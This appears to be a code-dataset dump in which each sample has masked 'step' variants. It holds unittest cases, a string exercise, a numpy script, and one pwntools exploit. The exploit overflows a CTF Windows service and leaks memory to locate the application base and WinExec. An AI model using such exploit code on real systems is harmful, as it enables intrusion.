'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n 
self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-2": "<mask token>\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n 
self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-3": "<mask token>\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, 
split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-4": "import unittest\nfrom unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split\nfrom unflatten import _recognize_lists\nfrom unflatten import _tree_to_path_tuples_with_values\nfrom unflatten import brackets_join\nfrom unflatten import flatten\nfrom unflatten import unflatten\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(list(_tree_to_path_tuples_with_values({'a':\n ['b', {'e': 1}]})), [(('a', 0), 'b'), (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(_path_tuples_with_values_to_dict_tree([(('a', \n 0), 'b'), (('a', 1, 'e'), 1)]), {'a': {(0): 'b', (1): {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertListEqual(_recognize_lists({(0): 'a', (1): {'b': -1, 'c':\n {(0): 'd', (1): -2}}}), ['a', {'b': -1, 'c': ['d', -2]}])\n\n def test_again(self):\n self.assertDictEqual(unflatten({'a': 1, 'b': {(0): 'c', (1): {(0):\n 'd', (1): {'e': {'f': -1, 'g': 'h'}}}}}), {'a': 1, 'b': ['c', [\n 'd', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}), {'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(flatten({'a': 1, 'b': ['c', ['d', {'e': {'f': \n -1, 'g': 'h'}}]]}, join=dot_colon_join), {'a': 1, 'b:0': 'c',\n 'b:1:0': 'd', 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'})\n\n\nclass UnflattenTestCase(unittest.TestCase):\n\n def test_simple(self):\n 
self.assertDictEqual(unflatten({'a': 1, 'b[0]': 'c', 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1, 'b[1][1][e][g]': 'h'}), {'a': 1, 'b': ['c',\n ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(unflatten({'a': 1, 'b:0': 'c', 'b:1:0': 'd',\n 'b:1:1.e.f': -1, 'b:1:1.e.g': 'h'}, split=dot_colon_split), {\n 'a': 1, 'b': ['c', ['d', {'e': {'f': -1, 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-5": "import unittest\n\nfrom unflatten import _path_tuples_with_values_to_dict_tree, dot_colon_join, dot_colon_split\nfrom unflatten import _recognize_lists\nfrom unflatten import _tree_to_path_tuples_with_values\nfrom unflatten import brackets_join\nfrom unflatten import flatten\nfrom unflatten import unflatten\n\n\nclass BracketsReduceTestCase(unittest.TestCase):\n def test_one_element(self):\n self.assertEqual(brackets_join(['aa']), 'aa')\n\n def test_simple(self):\n self.assertEqual(brackets_join(['aa', 1, 'bb', 2]), 'aa[1][bb][2]')\n\n\nclass TreeToPathTuplesWithValuesTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertSequenceEqual(\n list(_tree_to_path_tuples_with_values(\n {'a': ['b',\n {'e': 1}]})),\n [(('a', 0), 'b'),\n (('a', 1, 'e'), 1)])\n\n\nclass PathTuplesWithValuesToDictTreeTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n _path_tuples_with_values_to_dict_tree(\n [(('a', 0), 'b'),\n (('a', 1, 'e'), 1)]),\n {'a': {0: 'b',\n 1: {'e': 1}}})\n\n\nclass RecognizeListsTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertListEqual(\n _recognize_lists(\n {0: 'a',\n 1: {'b': -1,\n 'c': {0: 'd',\n 1: -2}}}),\n ['a',\n {'b': -1,\n 'c': ['d',\n -2]}])\n\n def test_again(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b': {0: 'c',\n 1: {0: 'd',\n 1: {'e': {'f': -1,\n 'g': 'h'}}}}}),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n\nclass FlattenTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n flatten(\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]}),\n {'a': 1,\n 'b[0]': 'c',\n 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1,\n 'b[1][1][e][g]': 'h'})\n\n def test_dot_colon(self):\n self.assertDictEqual(\n flatten(\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]},\n join=dot_colon_join),\n {'a': 1,\n 'b:0': 'c',\n 'b:1:0': 'd',\n 'b:1:1.e.f': -1,\n 'b:1:1.e.g': 'h'})\n\n\nclass 
UnflattenTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b[0]': 'c',\n 'b[1][0]': 'd',\n 'b[1][1][e][f]': -1,\n 'b[1][1][e][g]': 'h'}),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n def test_dot_colon(self):\n self.assertDictEqual(\n unflatten(\n {'a': 1,\n 'b:0': 'c',\n 'b:1:0': 'd',\n 'b:1:1.e.f': -1,\n 'b:1:1.e.g': 'h'},\n split=dot_colon_split),\n {'a': 1,\n 'b': ['c',\n ['d',\n {'e': {'f': -1,\n 'g': 'h'}}]]})\n\n\nclass DotColonJoinTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertSequenceEqual(dot_colon_join(('a',)), 'a')\n self.assertSequenceEqual(dot_colon_join(('b', 0)), 'b:0')\n self.assertSequenceEqual(dot_colon_join(('b', 1)), 'b:1')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'e')), 'b:2.e')\n self.assertSequenceEqual(dot_colon_join(('b', 2, 'f')), 'b:2.f')\n\n\nclass DotColonSplitTestCase(unittest.TestCase):\n def test_simple(self):\n self.assertTupleEqual(dot_colon_split('a'), ('a',))\n self.assertTupleEqual(dot_colon_split('b:0'), ('b', 0))\n self.assertTupleEqual(dot_colon_split('b:1'), ('b', 1))\n self.assertTupleEqual(dot_colon_split('b:2.e'), ('b', 2, 'e'))\n self.assertTupleEqual(dot_colon_split('b:2.f'), ('b', 2, 'f'))\n",
"step-ids": [
13,
17,
20,
21,
22
]
}
|
[
13,
17,
20,
21,
22
] |
def merge_the_tools(string, k):
if(len(string)%k != 0):
exit()
else:
L = []
for i in range(0, len(string), k):
L.append(''.join(list(dict.fromkeys(string[i:i+k]))))
print('\n'.join(L))
if __name__ == '__main__':
string, k = input(), int(input())
merge_the_tools(string, k)
# S, N = input(), int(input())
# for part in zip(*[iter(S)] * N):
# asterisk unpacks a list. Example: print(*[1,2,3,4]) = print(1,2,3,4)
# [iter(s)]*n makes a list of n times the same iterator for s.
# Example: [[iter(s)]*3] = ([iter(s), iter(s), iter(s)])
# if s = 'abcdefghi', then zip(*[iter(s)]*3) will have the following effect:
# a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i
# ^ ^ ^
# ^ ^ ^
# ^ ^ ^
# d = dict()
# print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))
|
normal
|
{
"blob_id": "0004e90622f8b13ec7ce0c1f49e8c8df7ea07269",
"index": 7098,
"step-1": "<mask token>\n",
"step-2": "def merge_the_tools(string, k):\n if len(string) % k != 0:\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i + k]))))\n print('\\n'.join(L))\n\n\n<mask token>\n",
"step-3": "def merge_the_tools(string, k):\n if len(string) % k != 0:\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i + k]))))\n print('\\n'.join(L))\n\n\nif __name__ == '__main__':\n string, k = input(), int(input())\n merge_the_tools(string, k)\n",
"step-4": "def merge_the_tools(string, k):\n if(len(string)%k != 0):\n exit()\n else:\n L = []\n for i in range(0, len(string), k):\n L.append(''.join(list(dict.fromkeys(string[i:i+k]))))\n print('\\n'.join(L))\n\nif __name__ == '__main__':\n\n string, k = input(), int(input())\n merge_the_tools(string, k)\n\n\n# S, N = input(), int(input())\n# for part in zip(*[iter(S)] * N):\n# asterisk unpacks a list. Example: print(*[1,2,3,4]) = print(1,2,3,4)\n# [iter(s)]*n makes a list of n times the same iterator for s.\n# Example: [[iter(s)]*3] = ([iter(s), iter(s), iter(s)])\n# if s = 'abcdefghi', then zip(*[iter(s)]*3) will have the following effect:\n# a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i a,b,c,d,e,f,g,h,i\n# ^ ^ ^\n# ^ ^ ^\n# ^ ^ ^\n# d = dict()\n# print(''.join([ d.setdefault(c, c) for c in part if c not in d ]))\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context(arch='amd64', os='windows', log_level='debug')
<|reserved_special_token_0|>
log.info('Enviando estágio 1')
<|reserved_special_token_0|>
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
<|reserved_special_token_0|>
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
<|reserved_special_token_0|>
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
<|reserved_special_token_0|>
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
<|reserved_special_token_0|>
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
<|reserved_special_token_0|>
p1.recv(4096)
<|reserved_special_token_0|>
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
context(arch='amd64', os='windows', log_level='debug')
host = '192.168.255.201'
port = 54345
log.info('Enviando estágio 1')
payload1 = 'H2HC'
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
payload2 = 'H2HC'
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, '\x00'))
base_addr = leak_local_addr & 18446744073709486080
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, '\x00'))
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host = '192.168.255.201'
port = 54345
log.info('Enviando estágio 1')
payload1 = 'H2HC'
payload1 += 'ÿ\x00\x00\x00'
payload1 += 'A' * 255
payload1 += '\n'
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
log.info('Enviando estágio 2')
payload2 = 'H2HC'
payload2 += 'ÿ\x00\x00\x00'
payload2 += 'A' * 256
payload2 += '\x04\t\x00\x00'
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil('H2HC19 message:')
p1.recv(269)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, '\x00'))
base_addr = leak_local_addr & 18446744073709486080
log.info('Local leak : %s' % hex(leak_local_addr))
log.info('App Base Addr : %s' % hex(base_addr))
p1.recv(2032)
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, '\x00'))
log.info('WinExec addr leak : %s' % hex(leak))
<|reserved_special_token_1|>
#!/usr/bin/python
# -*- coding: utf-8 -*-
'''
H2HC application created for the CTF.
Exploit written by M4v3r1ck (helvio_junior[at]hotmail[dot]com)
'''
from pwn import *
import os
context(arch='amd64', os='windows', log_level='debug')
host= "192.168.255.201"
port = 54345
# Stage 1
log.info("Enviando estágio 1")
payload1 = "H2HC" # cookie
payload1 += "\xff\x00\x00\x00" # size field that triggers the vulnerability
payload1 += "\x41" * 0xff
payload1 += "\n"
p = remote(host, port)
p.send(payload1)
p.recv(4096)
p.close()
# Stage 2
log.info("Enviando estágio 2")
payload2 = "H2HC"
payload2 += "\xff\x00\x00\x00"
payload2 += "A" * 0x100
payload2 += "\x04\x09\x00\x00"
p1 = remote(host, port)
p1.send(payload2)
p1.recvuntil("H2HC19 message:")
# Leak of an address inside the application's own execution flow (.text section)
p1.recv(0x10d)
ld1 = p1.recv(8)
leak_local_addr = u64(ld1.ljust(8, "\x00"))
base_addr = leak_local_addr & 0xffffffffffff0000
log.info("Local leak : %s" % hex(leak_local_addr))
log.info("App Base Addr : %s" % hex(base_addr))
# Leak of the WinExec function address
p1.recv(0x7f0) # offset from position zero up to the bytes 90 f0 7e 0a fa 7f
lead_data = p1.recv(8)
p1.recv(4096)
leak = u64(lead_data.ljust(8, "\x00"))
log.info("WinExec addr leak : %s" % hex(leak))
|
flexible
|
{
"blob_id": "4fff64a62776a9d1b06cc11d5e55fc00f6787338",
"index": 8128,
"step-1": "<mask token>\n",
"step-2": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\n<mask token>\nlog.info('Enviando estágio 1')\n<mask token>\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\n<mask token>\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\n<mask token>\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\n<mask token>\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\n<mask token>\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\n<mask token>\np1.recv(4096)\n<mask token>\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-3": "<mask token>\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-4": "<mask token>\nfrom pwn import *\nimport os\ncontext(arch='amd64', os='windows', log_level='debug')\nhost = '192.168.255.201'\nport = 54345\nlog.info('Enviando estágio 1')\npayload1 = 'H2HC'\npayload1 += 'ÿ\\x00\\x00\\x00'\npayload1 += 'A' * 255\npayload1 += '\\n'\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\nlog.info('Enviando estágio 2')\npayload2 = 'H2HC'\npayload2 += 'ÿ\\x00\\x00\\x00'\npayload2 += 'A' * 256\npayload2 += '\\x04\\t\\x00\\x00'\np1 = remote(host, port)\np1.send(payload2)\np1.recvuntil('H2HC19 message:')\np1.recv(269)\nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, '\\x00'))\nbase_addr = leak_local_addr & 18446744073709486080\nlog.info('Local leak : %s' % hex(leak_local_addr))\nlog.info('App Base Addr : %s' % hex(base_addr))\np1.recv(2032)\nlead_data = p1.recv(8)\np1.recv(4096)\nleak = u64(lead_data.ljust(8, '\\x00'))\nlog.info('WinExec addr leak : %s' % hex(leak))\n",
"step-5": "#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\nAplicação H2HC criado para CTF\nExploit criado por M4v3r1ck (helvio_junior[at]hotmail[dot]com)\n'''\n\nfrom pwn import *\nimport os\n \ncontext(arch='amd64', os='windows', log_level='debug')\n\nhost= \"192.168.255.201\"\nport = 54345\n\n# Estágio 1\nlog.info(\"Enviando estágio 1\")\npayload1 = \"H2HC\" #cookie \npayload1 += \"\\xff\\x00\\x00\\x00\" #size to trigger the vul\npayload1 += \"\\x41\" * 0xff\npayload1 += \"\\n\"\n\np = remote(host, port)\np.send(payload1)\np.recv(4096)\np.close()\n\n# Estágio 2\nlog.info(\"Enviando estágio 2\")\npayload2 = \"H2HC\" \npayload2 += \"\\xff\\x00\\x00\\x00\" \npayload2 += \"A\" * 0x100\npayload2 += \"\\x04\\x09\\x00\\x00\" \n\n\np1 = remote(host, port)\np1.send(payload2)\n\np1.recvuntil(\"H2HC19 message:\")\n\n\n#Leak de um endereço no próprio fluxo de execução da aplicação (Sessão .text)\np1.recv(0x10d) \nld1 = p1.recv(8)\nleak_local_addr = u64(ld1.ljust(8, \"\\x00\"))\n\nbase_addr = leak_local_addr & 0xffffffffffff0000\n\nlog.info(\"Local leak : %s\" % hex(leak_local_addr))\nlog.info(\"App Base Addr : %s\" % hex(base_addr))\n\n# Leak do endereço da função WinExec\np1.recv(0x7f0) #offset entre a posição zero até o 90 f0 7e 0a fa 7f \nlead_data = p1.recv(8)\np1.recv(4096)\n\nleak = u64(lead_data.ljust(8, \"\\x00\"))\n\nlog.info(\"WinExec addr leak : %s\" % hex(leak))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import numpy
d1 = numpy.array([1.,0.,0.])
d2 = numpy.array([0.,1.,0.])
d3 = numpy.array([0.,0.,1.])
s0 = numpy.array([0.,0.,1.])
m2 = numpy.array([1.,0.,0.])
print "x y zeta"
for x in xrange(-100, 101):
for y in xrange(-100, 101):
s = x*d1 + y*d2 + 100*d3
e1 = numpy.cross(s, s0)
e1 /= numpy.linalg.norm(e1)
zeta = abs(numpy.dot(e1, m2))
print x,y,zeta
|
normal
|
{
"blob_id": "3d16f2da03c067d410bec7bfe96d874322533d30",
"index": 6693,
"step-1": "import numpy\n\nd1 = numpy.array([1.,0.,0.])\nd2 = numpy.array([0.,1.,0.])\nd3 = numpy.array([0.,0.,1.])\ns0 = numpy.array([0.,0.,1.])\nm2 = numpy.array([1.,0.,0.])\n\nprint \"x y zeta\"\nfor x in xrange(-100, 101):\n for y in xrange(-100, 101):\n s = x*d1 + y*d2 + 100*d3\n e1 = numpy.cross(s, s0)\n e1 /= numpy.linalg.norm(e1)\n zeta = abs(numpy.dot(e1, m2))\n print x,y,zeta\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.